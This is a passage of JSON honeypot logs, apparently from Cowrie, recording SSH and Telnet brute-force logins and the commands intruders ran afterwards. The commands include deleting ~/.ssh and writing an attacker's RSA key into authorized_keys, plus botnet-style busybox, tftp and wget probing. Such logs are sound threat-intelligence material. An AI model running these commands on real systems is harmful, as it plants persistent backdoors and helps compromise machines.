~","sensor":"my-vps","timestamp":"2025-09-09T07:49:37.907215Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:49:37.993810Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:49:37.994696Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54768,"dst_ip":"1.2.3.4","dst_port":22,"session":"69698c8a37ee","protocol":"ssh","message":"New connection: 212.227.235.229:54768 (1.2.3.4:22) [session: 69698c8a37ee]","sensor":"my-vps","timestamp":"2025-09-09T07:49:38.084515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:49:38.085288Z","src_ip":"212.227.235.229","session":"69698c8a37ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:49:38.169451Z","src_ip":"212.227.235.229","session":"69698c8a37ee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:49:38.552779Z","src_ip":"212.227.235.229","session":"69698c8a37ee"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:49:39.638940Z","src_ip":"212.227.235.229","session":"69698c8a37ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54776,"dst_ip":"1.2.3.4","dst_port":22,"session":"c487c7fb7a62","protocol":"ssh","message":"New connection: 212.227.235.229:54776 (1.2.3.4:22) [session: c487c7fb7a62]","sensor":"my-vps","timestamp":"2025-09-09T07:49:39.721851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:49:39.722758Z","src_ip":"212.227.235.229","session":"c487c7fb7a62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:49:39.807099Z","src_ip":"212.227.235.229","session":"c487c7fb7a62"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:49:40.185344Z","src_ip":"212.227.235.229","session":"c487c7fb7a62"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:49:40.270414Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:49:40.271370Z","src_ip":"212.227.235.229","session":"c487c7fb7a62"}
{"eventid":"cowrie.session.closed","duration":"122.5","message":"Connection lost after 122.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:49:49.646911Z","src_ip":"212.227.125.160","session":"d1da7a3b7ade"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:50:28.609998Z","src_ip":"176.65.149.186","session":"ab8e4bc22773"}
{"eventid":"cowrie.session.closed","duration":180.0717089176178,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:50:28.614789Z","src_ip":"176.65.149.186","session":"ab8e4bc22773"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59338,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b688dc12d31","protocol":"ssh","message":"New connection: 212.227.235.229:59338 (1.2.3.4:22) [session: 4b688dc12d31]","sensor":"my-vps","timestamp":"2025-09-09T07:50:45.506455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:50:45.507179Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:50:45.590122Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.login.success","username":"root","password":"bb123456","message":"login attempt [root/bb123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:50:45.966730Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:50:46.181200Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.181938Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.182850Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.266769Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:50:46.449566Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.450310Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.535951Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.536782Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59346,"dst_ip":"1.2.3.4","dst_port":22,"session":"26b0badc8756","protocol":"ssh","message":"New connection: 212.227.235.229:59346 (1.2.3.4:22) [session: 26b0badc8756]","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.620726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.621488Z","src_ip":"212.227.235.229","session":"26b0badc8756"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:50:46.706391Z","src_ip":"212.227.235.229","session":"26b0badc8756"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:50:47.087737Z","src_ip":"212.227.235.229","session":"26b0badc8756"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:50:48.185167Z","src_ip":"212.227.235.229","session":"26b0badc8756"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59356,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d6d870073b0","protocol":"ssh","message":"New connection: 212.227.235.229:59356 (1.2.3.4:22) [session: 5d6d870073b0]","sensor":"my-vps","timestamp":"2025-09-09T07:50:48.267978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:50:48.268798Z","src_ip":"212.227.235.229","session":"5d6d870073b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:50:48.353001Z","src_ip":"212.227.235.229","session":"5d6d870073b0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:50:48.735829Z","src_ip":"212.227.235.229","session":"5d6d870073b0"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:50:48.820729Z","src_ip":"212.227.235.229","session":"4b688dc12d31"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:50:48.821986Z","src_ip":"212.227.235.229","session":"5d6d870073b0"}
{"eventid":"cowrie.session.connect","src_ip":"220.132.125.36","src_port":60037,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ca3fd458f0f","protocol":"telnet","message":"New connection: 220.132.125.36:60037 (1.2.3.4:23) [session: 4ca3fd458f0f]","sensor":"my-vps","timestamp":"2025-09-09T07:50:59.297451Z"}
{"eventid":"cowrie.session.connect","src_ip":"106.219.145.85","src_port":5885,"dst_ip":"1.2.3.4","dst_port":23,"session":"06eb7f46c229","protocol":"telnet","message":"New connection: 106.219.145.85:5885 (1.2.3.4:23) [session: 06eb7f46c229]","sensor":"my-vps","timestamp":"2025-09-09T07:51:07.607816Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"","message":"login attempt [admin/] failed","sensor":"my-vps","timestamp":"2025-09-09T07:51:08.849618Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1234","message":"login attempt [admin/admin1234] failed","sensor":"my-vps","timestamp":"2025-09-09T07:51:10.045459Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pass","message":"login attempt [admin/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T07:51:11.289576Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.login.failed","username":"admin","password":"7ujMko0admin","message":"login attempt [admin/7ujMko0admin] failed","sensor":"my-vps","timestamp":"2025-09-09T07:51:12.508258Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T07:51:13.734119Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.login.success","username":"root","password":"5up","message":"login attempt [root/5up] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:51:14.966327Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:51:15.022219Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-09-09T07:51:15.414118Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-09-09T07:51:15.415748Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-09-09T07:51:15.416597Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-09-09T07:51:15.417600Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-09-09T07:51:15.418914Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-09-09T07:51:15.419672Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox HVYYG","message":"CMD: cat /proc/mounts; /bin/busybox HVYYG","sensor":"my-vps","timestamp":"2025-09-09T07:51:15.822580Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HVYYG","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HVYYG","sensor":"my-vps","timestamp":"2025-09-09T07:51:16.231134Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox HVYYG","message":"CMD: tftp; wget; /bin/busybox HVYYG","sensor":"my-vps","timestamp":"2025-09-09T07:51:16.646403Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-09-09T07:51:17.448690Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-09-09T07:51:17.450871Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"/bin/busybox HVYYG","message":"CMD: /bin/busybox HVYYG","sensor":"my-vps","timestamp":"2025-09-09T07:51:17.847871Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-09-09T07:51:17.850069Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-09-09T07:51:17.851580Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-09-09T07:51:17.852453Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f0079f6b440c8a7b0681427273efe7391d9602da353ad1f302d6bc546f5e0c67","size":3550,"shasum":"f0079f6b440c8a7b0681427273efe7391d9602da353ad1f302d6bc546f5e0c67","duplicate":false,"duration":"2.8","message":"Closing TTY Log: var/lib/cowrie/tty/f0079f6b440c8a7b0681427273efe7391d9602da353ad1f302d6bc546f5e0c67 after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:51:17.854012Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.session.closed","duration":10.251388549804688,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:51:17.859122Z","src_ip":"106.219.145.85","session":"06eb7f46c229"}
{"eventid":"cowrie.session.closed","duration":30.638935089111328,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:51:29.936314Z","src_ip":"220.132.125.36","session":"4ca3fd458f0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51702,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e2ba6e87603","protocol":"ssh","message":"New connection: 212.227.235.229:51702 (1.2.3.4:22) [session: 4e2ba6e87603]","sensor":"my-vps","timestamp":"2025-09-09T07:51:54.012999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:51:54.014066Z","src_ip":"212.227.235.229","session":"4e2ba6e87603"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],